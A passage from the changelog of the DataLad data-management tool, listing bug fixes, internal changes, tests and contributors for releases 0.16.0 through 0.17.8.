[@yarikoptic](https://github.com/yarikoptic))\n\n<a id='changelog-0.17.8'></a>\n# 0.17.8 (2022-10-24)\n\n## Bug Fixes\n\n- Prevent adding duplicate entries to .gitmodules. [PR #7088](https://github.com/datalad/datalad/pull/7088) (by [@yarikoptic](https://github.com/yarikoptic))\n\n- [BF] Prevent double yielding of impossible get result\n Fixes [#5537](https://github.com/datalad/datalad/issues/5537).\n [PR #7093](https://github.com/datalad/datalad/pull/7093) (by\n [@jsheunis](https://github.com/jsheunis))\n\n- Stop rendering the output of internal `subdatset()` call in the\n results of `run_procedure()`.\n Fixes [#7091](https://github.com/datalad/datalad/issues/7091) via\n [PR #7094](https://github.com/datalad/datalad/pull/7094)\n (by [@mslw](https://github.com/mslw) & [@mih](https://github.com/mih))\n\n- Improve handling of `--existing reconfigure` in\n `create-sibling-ria`: previously, the command would not make the\n underlying `git init` call for existing local repositories, leading\n to some configuration updates not being applied. Partially addresses\n https://github.com/datalad/datalad/issues/6967 via\n https://github.com/datalad/datalad/pull/7095 (by @mslw)\n\n- Ensure subprocess environments have a valid path in `os.environ['PWD']`,\n even if a Path-like object was given to the runner on subprocess creation\n or invocation.\n Fixes [#7040](https://github.com/datalad/datalad/issues/7040) via\n [PR #7107](https://github.com/datalad/datalad/pull/7107)\n (by [@christian-monch](https://github.com/christian-monch))\n\n- Improved reporting when using `dry-run` with github-like\n `create-sibling*` commands (`-gin`, `-gitea`, `-github`,\n `-gogs`). The result messages will now display names of the\n repositories which would be created (useful for recursive\n operations).\n [PR #7103](https://github.com/datalad/datalad/pull/7103)\n (by [@mslw](https://github.com/mslw))\n\n<a id='changelog-0.17.7'></a>\n# 0.17.7 (2022-10-14)\n\n## Bug Fixes\n\n- Let `EnsureChoice` report the value is failed validating.\n [PR #7067](https://github.com/datalad/datalad/pull/7067) (by\n [@mih](https://github.com/mih))\n\n- Avoid writing to stdout/stderr from within datalad sshrun. This could lead to\n broken pipe errors when cloning via SSH and was superfluous to begin with.\n Fixes https://github.com/datalad/datalad/issues/6599 via\n https://github.com/datalad/datalad/pull/7072 (by @bpoldrack)\n\n- BF: lock across threads check/instantiation of Flyweight instances. Fixes [#6598](https://github.com/datalad/datalad/issues/6598) via [PR #7075](https://github.com/datalad/datalad/pull/7075) (by [@yarikoptic](https://github.com/yarikoptic))\n\n## Internal\n\n- Do not use `gen4`-metadata methods in `datalad metadata`-command.\n [PR #7001](https://github.com/datalad/datalad/pull/7001) (by\n [@christian-monch](https://github.com/christian-monch))\n\n- Revert \"Remove chardet version upper limit\" (introduced in 0.17.6~11^2) to bring back upper limit <= 5.0.0 on chardet. Otherwise we can get some deprecation warnings from requests [PR #7057](https://github.com/datalad/datalad/pull/7057) (by [@yarikoptic](https://github.com/yarikoptic))\n\n- Ensure that `BatchedCommandError` is raised if the subprocesses of `BatchedCommand` fails or raises a `CommandError`. [PR #7068](https://github.com/datalad/datalad/pull/7068) (by [@christian-monch](https://github.com/christian-monch))\n\n- RF: remove unused code str-ing PurePath. [PR #7073](https://github.com/datalad/datalad/pull/7073) (by\n [@yarikoptic](https://github.com/yarikoptic))\n\n- Update GitHub Actions action versions.\n [PR #7082](https://github.com/datalad/datalad/pull/7082) (by\n [@jwodder](https://github.com/jwodder))\n\n## Tests\n\n- Fix broken test helpers for result record testing that would falsely pass.\n [PR #7002](https://github.com/datalad/datalad/pull/7002) (by [@bpoldrack](https://github.com/bpoldrack))\n\n<a id='changelog-0.17.6'></a>\n# 0.17.6 (2022-09-21)\n\n## Bug Fixes\n\n- UX: push - provide specific error with details if push failed due to\n permission issue. [PR #7011](https://github.com/datalad/datalad/pull/7011)\n (by [@yarikoptic](https://github.com/yarikoptic))\n\n- Fix datalad --help to not have *Global options* empty with python 3.10 and\n list options in \"options:\" section.\n [PR #7028](https://github.com/datalad/datalad/pull/7028)\n (by [@yarikoptic](https://github.com/yarikoptic))\n\n- Let `create` touch the dataset root, if not saving in parent dataset.\n [PR #7036](https://github.com/datalad/datalad/pull/7036) (by\n [@mih](https://github.com/mih))\n\n- Let `get_status_dict()` use exception message if none is passed.\n [PR #7037](https://github.com/datalad/datalad/pull/7037) (by\n [@mih](https://github.com/mih))\n\n- Make choices for `status|diff --annex` and `status|diff --untracked` visible.\n [PR #7039](https://github.com/datalad/datalad/pull/7039) (by\n [@mih](https://github.com/mih))\n\n- push: Assume 0 bytes pushed if git-annex does not provide bytesize.\n [PR #7049](https://github.com/datalad/datalad/pull/7049) (by\n [@yarikoptic](https://github.com/yarikoptic))\n\n## Internal\n\n- Use scriv for CHANGELOG generation in release workflow.\n [PR #7009](https://github.com/datalad/datalad/pull/7009) (by\n [@jwodder](https://github.com/jwodder))\n\n- Stop using auto.\n [PR #7024](https://github.com/datalad/datalad/pull/7024)\n (by [@jwodder](https://github.com/jwodder))\n\n## Tests\n\n- Allow for any 2 from first 3 to be consumed in test_gracefull_death.\n [PR #7041](https://github.com/datalad/datalad/pull/7041) (by\n [@yarikoptic](https://github.com/yarikoptic))\n\n---\n\n# 0.17.5 (Fri Sep 02 2022)\n\n#### 🐛 Bug Fix\n\n- BF: blacklist 23.9.0 of keyring as introduces regression [#7003](https://github.com/datalad/datalad/pull/7003) ([@yarikoptic](https://github.com/yarikoptic))\n- Make the manpages build reproducible via datalad.source.epoch (to be used in Debian packaging) [#6997](https://github.com/datalad/datalad/pull/6997) ([@lamby](https://github.com/lamby) [email protected] [@yarikoptic](https://github.com/yarikoptic))\n- BF: backquote path/drive in Changelog [#6997](https://github.com/datalad/datalad/pull/6997) ([@yarikoptic](https://github.com/yarikoptic))\n\n#### Authors: 3\n\n- Chris Lamb ([@lamby](https://github.com/lamby))\n- DataLad Bot ([email protected])\n- Yaroslav Halchenko ([@yarikoptic](https://github.com/yarikoptic))\n\n---\n\n# 0.17.4 (Tue Aug 30 2022)\n\n#### 🐛 Bug Fix\n\n- BF: make logic more consistent for files=[] argument (which is False but not None) [#6976](https://github.com/datalad/datalad/pull/6976) ([@yarikoptic](https://github.com/yarikoptic))\n- Run pytests in parallel (-n 2) on appveyor [#6987](https://github.com/datalad/datalad/pull/6987) ([@yarikoptic](https://github.com/yarikoptic))\n- Add workflow for autogenerating changelog snippets [#6981](https://github.com/datalad/datalad/pull/6981) ([@jwodder](https://github.com/jwodder))\n- Provide `/dev/null` (`b:\\nul` on 💾 Windows) instead of empty string as a git-repo to avoid reading local repo configuration [#6986](https://github.com/datalad/datalad/pull/6986) ([@yarikoptic](https://github.com/yarikoptic))\n- RF: call_from_parser - move code into \"else\" to simplify reading etc [#6982](https://github.com/datalad/datalad/pull/6982) ([@yarikoptic](https://github.com/yarikoptic))\n- BF: if early attempt to parse resulted in error, setup subparsers [#6980](https://github.com/datalad/datalad/pull/6980) ([@yarikoptic](https://github.com/yarikoptic))\n- Run pytests in parallel (-n 2) on Travis [#6915](https://github.com/datalad/datalad/pull/6915) ([@yarikoptic](https://github.com/yarikoptic))\n- Send one character (no newline) to stdout in protocol test to guarantee a single \"message\" and thus a single custom value [#6978](https://github.com/datalad/datalad/pull/6978) ([@christian-monch](https://github.com/christian-monch))\n\n#### 🧪 Tests\n\n- TST: test_stalling -- wait x10 not just x5 time [#6995](https://github.com/datalad/datalad/pull/6995) ([@yarikoptic](https://github.com/yarikoptic))\n\n#### Authors: 3\n\n- Christian Mönch ([@christian-monch](https://github.com/christian-monch))\n- John T. Wodder II ([@jwodder](https://github.com/jwodder))\n- Yaroslav Halchenko ([@yarikoptic](https://github.com/yarikoptic))\n\n---\n\n# 0.17.3 (Tue Aug 23 2022)\n\n#### 🐛 Bug Fix\n\n- BF: git_ignore_check do not overload possible value of stdout/err if present [#6937](https://github.com/datalad/datalad/pull/6937) ([@yarikoptic](https://github.com/yarikoptic))\n- DOCfix: fix docstring GeneratorStdOutErrCapture to say that treats both stdout and stderr identically [#6930](https://github.com/datalad/datalad/pull/6930) ([@yarikoptic](https://github.com/yarikoptic))\n- Explain purpose of create-sibling-ria's --post-update-hook [#6958](https://github.com/datalad/datalad/pull/6958) ([@mih](https://github.com/mih))\n- ENH+BF: get_parent_paths - make / into sep option and consistently use \"/\" as path separator [#6963](https://github.com/datalad/datalad/pull/6963) ([@yarikoptic](https://github.com/yarikoptic))\n- BF(TEMP): use git-annex from neurodebian -devel to gain fix for bug detected with datalad-crawler [#6965](https://github.com/datalad/datalad/pull/6965) ([@yarikoptic](https://github.com/yarikoptic))\n- BF(TST): make tests use _path_ helper for Windows \"friendliness\" of the tests [#6955](https://github.com/datalad/datalad/pull/6955) ([@yarikoptic](https://github.com/yarikoptic))\n- BF(TST): prevent auto-upgrade of \"remote\" test sibling, do not use local path for URL [#6957](https://github.com/datalad/datalad/pull/6957) ([@yarikoptic](https://github.com/yarikoptic))\n- Forbid drop operation from symlink'ed annex (e.g. due to being cloned with --reckless=ephemeral) to prevent data-loss [#6959](https://github.com/datalad/datalad/pull/6959) ([@mih](https://github.com/mih))\n- Acknowledge git-config comment chars [#6944](https://github.com/datalad/datalad/pull/6944) ([@mih](https://github.com/mih) [@yarikoptic](https://github.com/yarikoptic))\n- Minor tuneups to please updated codespell [#6956](https://github.com/datalad/datalad/pull/6956) ([@yarikoptic](https://github.com/yarikoptic))\n- TST: Add a testcase for #6950 [#6957](https://github.com/datalad/datalad/pull/6957) ([@adswa](https://github.com/adswa))\n- BF+ENH(TST): fix typo in code of wtf filesystems reports [#6920](https://github.com/datalad/datalad/pull/6920) ([@yarikoptic](https://github.com/yarikoptic))\n- DOC: Datalad -> DataLad [#6937](https://github.com/datalad/datalad/pull/6937) ([@aqw](https://github.com/aqw))\n- BF: fix typo which prevented silently to not show details of filesystems [#6930](https://github.com/datalad/datalad/pull/6930) ([@yarikoptic](https://github.com/yarikoptic))\n- BF(TST): allow for a annex repo version to upgrade if running in adjusted branches [#6927](https://github.com/datalad/datalad/pull/6927) ([@yarikoptic](https://github.com/yarikoptic))\n- RF extensions github action to centralize configuration for extensions etc, use pytest for crawler [#6914](https://github.com/datalad/datalad/pull/6914) ([@yarikoptic](https://github.com/yarikoptic))\n- BF: travis - mark our directory as safe to interact with as root [#6919](https://github.com/datalad/datalad/pull/6919) ([@yarikoptic](https://github.com/yarikoptic))\n- BF: do not pretend we know what repo version git-annex would upgrade to [#6902](https://github.com/datalad/datalad/pull/6902) ([@yarikoptic](https://github.com/yarikoptic))\n- BF(TST): do not expect log message for guessing Path to be possibly a URL on windows [#6911](https://github.com/datalad/datalad/pull/6911) ([@yarikoptic](https://github.com/yarikoptic))\n- ENH(TST): Disable coverage reporting on travis while running pytest [#6898](https://github.com/datalad/datalad/pull/6898) ([@yarikoptic](https://github.com/yarikoptic))\n- RF: just rename internal variable from unclear \"op\" to \"io\" [#6907](https://github.com/datalad/datalad/pull/6907) ([@yarikoptic](https://github.com/yarikoptic))\n- DX: Demote loglevel of message on url parameters to DEBUG while guessing RI [#6891](https://github.com/datalad/datalad/pull/6891) ([@adswa](https://github.com/adswa) [@yarikoptic](https://github.com/yarikoptic))\n- Fix and expand datalad.runner type annotations [#6893](https://github.com/datalad/datalad/pull/6893) ([@christian-monch](https://github.com/christian-monch) [@yarikoptic](https://github.com/yarikoptic))\n- Use pytest to test datalad-metalad in test_extensions-workflow [#6892](https://github.com/datalad/datalad/pull/6892) ([@christian-monch](https://github.com/christian-monch))\n- Let push honor multiple publication dependencies declared via siblings [#6869](https://github.com/datalad/datalad/pull/6869) ([@mih](https://github.com/mih) [@yarikoptic](https://github.com/yarikoptic))\n- ENH: upgrade versioneer from versioneer-0.20.dev0 to versioneer-0.23.dev0 [#6888](https://github.com/datalad/datalad/pull/6888) ([@yarikoptic](https://github.com/yarikoptic))\n- ENH: introduce typing checking and GitHub workflow [#6885](https://github.com/datalad/datalad/pull/6885) ([@yarikoptic](https://github.com/yarikoptic))\n- RF,ENH(TST): future proof testing of git annex version upgrade + test annex init on all supported versions [#6880](https://github.com/datalad/datalad/pull/6880) ([@yarikoptic](https://github.com/yarikoptic))\n- ENH(TST): test against supported git annex repo version 10 + make it a full sweep over tests [#6881](https://github.com/datalad/datalad/pull/6881) ([@yarikoptic](https://github.com/yarikoptic))\n- BF: RF f-string uses in logger to %-interpolations [#6886](https://github.com/datalad/datalad/pull/6886) ([@yarikoptic](https://github.com/yarikoptic))\n- Merge branch 'bf-sphinx-5.1.0' into maint [#6883](https://github.com/datalad/datalad/pull/6883) ([@yarikoptic](https://github.com/yarikoptic))\n- BF(DOC): workaround for #10701 of sphinx in 5.1.0 [#6883](https://github.com/datalad/datalad/pull/6883) ([@yarikoptic](https://github.com/yarikoptic))\n- Clarify confusing INFO log message from get() on dataset installation [#6871](https://github.com/datalad/datalad/pull/6871) ([@mih](https://github.com/mih))\n- Protect again failing to load a command interface from an extension [#6879](https://github.com/datalad/datalad/pull/6879) ([@mih](https://github.com/mih))\n- Support unsetting config via `datalad -c :<name>` [#6864](https://github.com/datalad/datalad/pull/6864) ([@mih](https://github.com/mih))\n- Fix DOC string typo in the path within AnnexRepo.annexstatus, and replace with proper sphinx reference [#6858](https://github.com/datalad/datalad/pull/6858) ([@christian-monch](https://github.com/christian-monch))\n- Improved support for saving typechanges [#6793](https://github.com/datalad/datalad/pull/6793) ([@mih](https://github.com/mih))\n\n#### ⚠️ Pushed to `maint`\n\n- BF: Remove duplicate ds key from result record ([@adswa](https://github.com/adswa))\n- DOC: fix capitalization of service names ([@aqw](https://github.com/aqw))\n\n#### 🧪 Tests\n\n- BF(TST,workaround): just xfail failing archives test on NFS [#6912](https://github.com/datalad/datalad/pull/6912) ([@yarikoptic](https://github.com/yarikoptic))\n\n#### Authors: 5\n\n- Adina Wagner ([@adswa](https://github.com/adswa))\n- Alex Waite ([@aqw](https://github.com/aqw))\n- Christian Mönch ([@christian-monch](https://github.com/christian-monch))\n- Michael Hanke ([@mih](https://github.com/mih))\n- Yaroslav Halchenko ([@yarikoptic](https://github.com/yarikoptic))\n\n---\n\n# 0.17.2 (Sat Jul 16 2022)\n\n#### 🐛 Bug Fix\n\n- BF(TST): do proceed to proper test for error being caught for recent git-annex on windows with symlinks [#6850](https://github.com/datalad/datalad/pull/6850) ([@yarikoptic](https://github.com/yarikoptic))\n- Addressing problem testing against python 3.10 on Travis (skip more annex versions) [#6842](https://github.com/datalad/datalad/pull/6842) ([@yarikoptic](https://github.com/yarikoptic))\n- XFAIL test_runner_parametrized_protocol on python3.8 when getting duplicate output [#6837](https://github.com/datalad/datalad/pull/6837) ([@yarikoptic](https://github.com/yarikoptic))\n- BF: Make create's check for procedures work with several again [#6841](https://github.com/datalad/datalad/pull/6841) ([@adswa](https://github.com/adswa))\n- Support older pytests [#6836](https://github.com/datalad/datalad/pull/6836) ([@jwodder](https://github.com/jwodder))\n\n#### Authors: 3\n\n- Adina Wagner ([@adswa](https://github.com/adswa))\n- John T. Wodder II ([@jwodder](https://github.com/jwodder))\n- Yaroslav Halchenko ([@yarikoptic](https://github.com/yarikoptic))\n\n---\n\n# 0.17.1 (Mon Jul 11 2022)\n\n#### 🐛 Bug Fix\n\n- DOC: minor fix - consistent DataLad (not Datalad) in docs and CHANGELOG [#6830](https://github.com/datalad/datalad/pull/6830) ([@yarikoptic](https://github.com/yarikoptic))\n- DOC: fixup/harmonize Changelog for 0.17.0 a little [#6828](https://github.com/datalad/datalad/pull/6828) ([@yarikoptic](https://github.com/yarikoptic))\n- BF: use --python-match minor option in new datalad-installer release to match outside version of Python [#6827](https://github.com/datalad/datalad/pull/6827) ([@christian-monch](https://github.com/christian-monch) [@yarikoptic](https://github.com/yarikoptic))\n- Do not quote paths for ssh >= 9 [#6826](https://github.com/datalad/datalad/pull/6826) ([@christian-monch](https://github.com/christian-monch) [@yarikoptic](https://github.com/yarikoptic))\n- Suppress DeprecationWarning to allow for distutils to be used [#6819](https://github.com/datalad/datalad/pull/6819) ([@yarikoptic](https://github.com/yarikoptic))\n- RM(TST): remove testing of datalad.test which was removed from 0.17.0 [#6822](https://github.com/datalad/datalad/pull/6822) ([@yarikoptic](https://github.com/yarikoptic))\n- Avoid import of nose-based tests.utils, make skip_if_no_module() and skip_if_no_network() allowed at module level [#6817](https://github.com/datalad/datalad/pull/6817) ([@jwodder](https://github.com/jwodder))\n- BF(TST): use higher level asyncio.run instead of asyncio.get_event_loop in test_inside_async [#6808](https://github.com/datalad/datalad/pull/6808) ([@yarikoptic](https://github.com/yarikoptic))\n\n#### Authors: 3\n\n- Christian Mönch ([@christian-monch](https://github.com/christian-monch))\n- John T. Wodder II ([@jwodder](https://github.com/jwodder))\n- Yaroslav Halchenko ([@yarikoptic](https://github.com/yarikoptic))\n\n---\n\n# 0.17.0 (Thu Jul 7 2022) -- pytest migration\n\n#### 💫 Enhancements and new features\n- \"log\" progress bar now reports about starting a specific action as well. [#6756](https://github.com/datalad/datalad/pull/6756) (by @yarikoptic)\n- Documentation and behavior of traceback reporting for log messages via `DATALAD_LOG_TRACEBACK` was improved to yield a more compact report. The documentation for this feature has been clarified. [#6746](https://github.com/datalad/datalad/pull/6746) (by @mih)\n- `datalad unlock` gained a progress bar. [#6704](https://github.com/datalad/datalad/pull/6704) (by @adswa)\n- When `create-sibling-gitlab` is called on non-existing subdatasets or paths it now returns an impossible result instead of no feedback at all. [#6701](https://github.com/datalad/datalad/pull/6701) (by @adswa)\n- `datalad wtf` includes a report on file system types of commonly used paths. [#6664](https://github.com/datalad/datalad/pull/6664) (by @adswa)\n- Use next generation metadata code in search, if it is available. [#6518](https://github.com/datalad/datalad/pull/6518) (by @christian-monch)\n\n#### 🪓 Deprecations and removals\n- Remove unused and untested log helpers `NoProgressLog` and `OnlyProgressLog`. [#6747](https://github.com/datalad/datalad/pull/6747) (by @mih)\n- Remove unused `sorted_files()` helper. [#6722](https://github.com/datalad/datalad/pull/6722) (by @adswa)\n- Discontinued the value `stdout` for use with the config variable `datalad.log.target` as its use would inevitably break special remote implementations. [#6675](https://github.com/datalad/datalad/pull/6675) (by @bpoldrack)\n- `AnnexRepo.add_urls()` is deprecated in favor of `AnnexRepo.add_url_to_file()` or a direct call to `AnnexRepo.call_annex()`. [#6667](https://github.com/datalad/datalad/pull/6667) (by @mih)\n- `datalad test` command and supporting functionality (e.g., `datalad.test`) were removed. [#6273](https://github.com/datalad/datalad/pull/6273) (by @jwodder)\n\n#### 🐛 Bug Fixes\n- `export-archive` does not rely on `normalize_path()` methods anymore and became more robust when called from subdirectories. [#6745](https://github.com/datalad/datalad/pull/6745) (by @adswa)\n- Sanitize keys before checking content availability to ensure that the content availability of files with URL- or custom backend keys is correctly determined and marked. [#6663](https://github.com/datalad/datalad/pull/6663) (by @adswa)\n- Ensure saving a new subdataset to a superdataset yields a valid `.gitmodules` record regardless of whether and how a path constraint is given to the `save()` call. Fixes #6547 [#6790](https://github.com/datalad/datalad/pull/6790) (by @mih)\n- `save` now repairs annex symlinks broken by a `git-mv` operation prior recording a new dataset state. Fixes #4967 [#6795](https://github.com/datalad/datalad/pull/6795) (by @mih)\n\n#### 📝 Documentation\n- API documentation for log helpers, like `log_progress()` is now included in the renderer documentation. [#6746](https://github.com/datalad/datalad/pull/6746) (by @mih)\n- New design document on progress reporting. [#6734](https://github.com/datalad/datalad/pull/6734) (by @mih)\n- Explain downstream consequences of using `--fast` option in `addurls`. [#6684](https://github.com/datalad/datalad/pull/6684) (by @jdkent)\n\n#### 🏠 Internal\n- Inline code of `create-sibling-ria` has been refactored to an internal helper to check for siblings with particular names across dataset hierarchies in `datalad-next`, and is reintroduced into core to modularize the code base further. [#6706](https://github.com/datalad/datalad/pull/6706) (by @adswa)\n- `get_initialized_logger` now lets a given `logtarget` take precedence over `datalad.log.target`. [#6675](https://github.com/datalad/datalad/pull/6675) (by @bpoldrack)\n- Many uses of deprecated call options were replaced with the recommended ones. [#6273](https://github.com/datalad/datalad/pull/6273) (by @jwodder)\n- Get rid of `asyncio` import by defining few noops methods from `asyncio.protocols.SubprocessProtocol` directly in `WitlessProtocol`. [#6648](https://github.com/datalad/datalad/pull/6648) (by @yarikoptic)\n- Consolidate `GitRepo.remove()` and `AnnexRepo.remove()` into a single implementation. [#6783](https://github.com/datalad/datalad/pull/6783) (by @mih)\n#### 🛡 Tests\n- Discontinue use of `with_testrepos` decorator other than for the deprecation cycle for `nose`. [#6690](https://github.com/datalad/datalad/pull/6690) (by @mih @bpoldrack) See [#6144](https://github.com/datalad/datalad/issues/6144) for full list of changes.\n- Remove usage of deprecated `AnnexRepo.add_urls` in tests. [#6683](https://github.com/datalad/datalad/pull/6683) (by @bpoldrack)\n- Minimalistic (adapters, no assert changes, etc) migration from `nose` to `pytest`.\n Support functionality possibly used by extensions and relying on `nose` helpers is left in place to avoid affecting their run time and defer migration of their test setups.. [#6273](https://github.com/datalad/datalad/pull/6273) (by @jwodder)\n\n#### Authors: 7\n\n- Yaroslav Halchenko (@yarikoptic)\n- Michael Hanke (@mih)\n- Benjamin Poldrack (@bpoldrack)\n- Adina Wagner (@adswa)\n- John T. Wodder (@jwodder)\n- Christian Mönch (@christian-monch)\n- James Kent (@jdkent)\n\n# 0.16.7 (Wed Jul 06 2022)\n\n#### 🐛 Bug Fix\n\n- Fix broken annex symlink after git-mv before saving + fix a race condition in ssh copy test [#6809](https://github.com/datalad/datalad/pull/6809) ([@christian-monch](https://github.com/christian-monch) [@mih](https://github.com/mih) [@yarikoptic](https://github.com/yarikoptic))\n- Do not ignore already known status info on submodules [#6790](https://github.com/datalad/datalad/pull/6790) ([@mih](https://github.com/mih))\n- Fix \"common data source\" test to use a valid URL (maint-based & extended edition) [#6788](https://github.com/datalad/datalad/pull/6788) ([@mih](https://github.com/mih) [@yarikoptic](https://github.com/yarikoptic))\n- Upload coverage from extension tests to Codecov [#6781](https://github.com/datalad/datalad/pull/6781) ([@jwodder](https://github.com/jwodder))\n- Clean up line end handling in GitRepo [#6768](https://github.com/datalad/datalad/pull/6768) ([@christian-monch](https://github.com/christian-monch))\n- Do not skip file-URL tests on windows [#6772](https://github.com/datalad/datalad/pull/6772) ([@christian-monch](https://github.com/christian-monch))\n- Fix test errors caused by updated chardet v5 release [#6777](https://github.com/datalad/datalad/pull/6777) ([@christian-monch](https://github.com/christian-monch))\n- Preserve final trailing slash in ``call_git()`` output [#6754](https://github.com/datalad/datalad/pull/6754) ([@adswa](https://github.com/adswa) [@yarikoptic](https://github.com/yarikoptic) [@christian-monch](https://github.com/christian-monch))\n\n#### ⚠️ Pushed to `maint`\n\n- Make sure a subdataset is saved with a complete .gitmodules record ([@mih](https://github.com/mih))\n\n#### Authors: 5\n\n- Adina Wagner ([@adswa](https://github.com/adswa))\n- Christian Mönch ([@christian-monch](https://github.com/christian-monch))\n- John T. Wodder II ([@jwodder](https://github.com/jwodder))\n- Michael Hanke ([@mih](https://github.com/mih))\n- Yaroslav Halchenko ([@yarikoptic](https://github.com/yarikoptic))\n\n---\n\n# 0.16.6 (Tue Jun 14 2022)\n\n#### 🐛 Bug Fix\n\n- Prevent duplicated result rendering when searching in default datasets [#6765](https://github.com/datalad/datalad/pull/6765) ([@christian-monch](https://github.com/christian-monch))\n- BF(workaround): skip test_ria_postclonecfg on OSX for now ([@yarikoptic](https://github.com/yarikoptic))\n- BF(workaround to #6759): if saving credential failed, just log error and continue [#6762](https://github.com/datalad/datalad/pull/6762) ([@yarikoptic](https://github.com/yarikoptic))\n- Prevent reentry of a runner instance [#6737](https://github.com/datalad/datalad/pull/6737) ([@christian-monch](https://github.com/christian-monch))\n\n#### Authors: 2\n\n- Christian Mönch ([@christian-monch](https://github.com/christian-monch))\n- Yaroslav Halchenko ([@yarikoptic](https://github.com/yarikoptic))\n\n---\n\n# 0.16.5 (Wed Jun 08 2022)\n\n#### 🐛 Bug Fix\n\n- BF: push to github - remove datalad-push-default-first config only in non-dry run to ensure we push default branch separately in next step [#6750](https://github.com/datalad/datalad/pull/6750) ([@yarikoptic](https://github.com/yarikoptic))\n- In addition to default (system) ssh version, report configured ssh; fix ssh version parsing on Windows [#6729](https://github.com/datalad/datalad/pull/6729) ([@yarikoptic](https://github.com/yarikoptic))\n\n#### Authors: 1\n\n- Yaroslav Halchenko ([@yarikoptic](https://github.com/yarikoptic))\n\n---\n\n# 0.16.4 (Thu Jun 02 2022)\n\n#### 🐛 Bug Fix\n\n- BF(TST): RO operations - add test directory into git safe.directory [#6726](https://github.com/datalad/datalad/pull/6726) ([@yarikoptic](https://github.com/yarikoptic))\n- DOC: fixup of docstring for skip_ssh [#6727](https://github.com/datalad/datalad/pull/6727) ([@yarikoptic](https://github.com/yarikoptic))\n- DOC: Set language in Sphinx config to en [#6727](https://github.com/datalad/datalad/pull/6727) ([@adswa](https://github.com/adswa))\n- BF: Catch KeyErrors from unavailable WTF infos [#6712](https://github.com/datalad/datalad/pull/6712) ([@adswa](https://github.com/adswa))\n- Add annex.private to ephemeral clones. That would make git-annex not assign shared (in git-annex branch) annex uuid. [#6702](https://github.com/datalad/datalad/pull/6702) ([@bpoldrack](https://github.com/bpoldrack) [@adswa](https://github.com/adswa))\n- BF: require argcomplete version at least 1.12.3 to test/operate correctly [#6693](https://github.com/datalad/datalad/pull/6693) ([@yarikoptic](https://github.com/yarikoptic))\n- Replace Zenodo DOI with JOSS for due credit [#6725](https://github.com/datalad/datalad/pull/6725) ([@adswa](https://github.com/adswa))\n\n#### Authors: 3\n\n- Adina Wagner ([@adswa](https://github.com/adswa))\n- Benjamin Poldrack ([@bpoldrack](https://github.com/bpoldrack))\n- Yaroslav Halchenko ([@yarikoptic](https://github.com/yarikoptic))\n\n---\n\n# 0.16.3 (Thu May 12 2022)\n\n#### 🐛 Bug Fix\n\n- No change for a PR to trigger release [#6692](https://github.com/datalad/datalad/pull/6692) ([@yarikoptic](https://github.com/yarikoptic))\n- Sanitize keys before checking content availability to ensure correct value for keys with URL or custom backend [#6665](https://github.com/datalad/datalad/pull/6665) ([@adswa](https://github.com/adswa) [@yarikoptic](https://github.com/yarikoptic))\n- Change a key-value pair in drop result record [#6625](https://github.com/datalad/datalad/pull/6625) ([@mslw](https://github.com/mslw))\n- Link docs of datalad-next [#6677](https://github.com/datalad/datalad/pull/6677) ([@mih](https://github.com/mih))\n- Fix `GitRepo.get_branch_commits_()` to handle branch names conflicts with paths [#6661](https://github.com/datalad/datalad/pull/6661) ([@mih](https://github.com/mih))\n- OPT: AnnexJsonProtocol - avoid dragging possibly long data around [#6660](https://github.com/datalad/datalad/pull/6660) ([@yarikoptic](https://github.com/yarikoptic))\n- Remove two too prominent create() INFO log message that duplicate DEBUG log and harmonize some other log messages [#6638](https://github.com/datalad/datalad/pull/6638) ([@mih](https://github.com/mih) [@yarikoptic](https://github.com/yarikoptic))\n- Remove unsupported parameter create_sibling_ria(existing=None) [#6637](https://github.com/datalad/datalad/pull/6637) ([@mih](https://github.com/mih))\n- Add released plugin to .autorc to annotate PRs on when released [#6639](https://github.com/datalad/datalad/pull/6639) ([@yarikoptic](https://github.com/yarikoptic))\n\n#### Authors: 4\n\n- Adina Wagner ([@adswa](https://github.com/adswa))\n- Michael Hanke ([@mih](https://github.com/mih))\n- Michał Szczepanik ([@mslw](https://github.com/mslw))\n- Yaroslav Halchenko ([@yarikoptic](https://github.com/yarikoptic))\n\n---\n\n# 0.16.2 (Thu Apr 21 2022)\n\n#### 🐛 Bug Fix\n\n- Demote (to level 1 from DEBUG) and speed-up API doc logging (parseParameters) [#6635](https://github.com/datalad/datalad/pull/6635) ([@mih](https://github.com/mih))\n- Factor out actual data transfer in push [#6618](https://github.com/datalad/datalad/pull/6618) ([@christian-monch](https://github.com/christian-monch))\n- ENH: include version of datalad in tests teardown Versions: report [#6628](https://github.com/datalad/datalad/pull/6628) ([@yarikoptic](https://github.com/yarikoptic))\n- MNT: Require importlib-metadata >=3.6 for Python < 3.10 for entry_points taking kwargs [#6631](https://github.com/datalad/datalad/pull/6631) ([@effigies](https://github.com/effigies))\n- Factor out credential handling of create-sibling-ghlike [#6627](https://github.com/datalad/datalad/pull/6627) ([@mih](https://github.com/mih))\n- BF: Fix wrong key name of annex' JSON records [#6624](https://github.com/datalad/datalad/pull/6624) ([@bpoldrack](https://github.com/bpoldrack))\n\n#### ⚠️ Pushed to `maint`\n\n- Fix typo in changelog ([@mih](https://github.com/mih))\n- [ci skip] minor typo fix ([@yarikoptic](https://github.com/yarikoptic))\n\n#### Authors: 5\n\n- Benjamin Poldrack ([@bpoldrack](https://github.com/bpoldrack))\n- Chris Markiewicz ([@effigies](https://github.com/effigies))\n- Christian Mönch ([@christian-monch](https://github.com/christian-monch))\n- Michael Hanke ([@mih](https://github.com/mih))\n- Yaroslav Halchenko ([@yarikoptic](https://github.com/yarikoptic))\n\n---\n\n# 0.16.1 (Fr Apr 8 2022) -- April Fools' Release\n\n- Fixes forgotten changelog in docs\n\n# 0.16.0 (Fr Apr 8 2022) -- Spring cleaning!\n\n#### 💫 Enhancements and new features\n\n- A new set of ``create-sibling-*`` commands reimplements the GitHub-platform support of ``create-sibling-github`` and adds support to interface three new platforms in a unified fashion: GIN (``create-sibling-gin``), GOGS (``create-sibling-gogs``), and Gitea (``create-sibling-gitea``). All commands rely on personal access tokens only for authentication, allow for specifying one of several stored credentials via a uniform ``--credential`` parameter, and support a uniform ``--dry-run`` mode for testing without network. [#5949](https://github.com/datalad/datalad/pull/5949) (by @mih)\n- ``create-sibling-github`` now has supports direct specification of organization repositories via a ``[<org>/]repo``syntax [#5949](https://github.com/datalad/datalad/pull/5949) (by @mih)\n- ``create-sibling-gitlab`` gained a ``--dry-run`` parameter to match the corresponding parameters in ``create-sibling-{github,gin,gogs,gitea}`` [#6013](https://github.com/datalad/datalad/pull/6013) (by @adswa)\n- The ``--new-store-ok`` parameter of ``create-sibling-ria`` only creates new RIA stores when explicitly provided 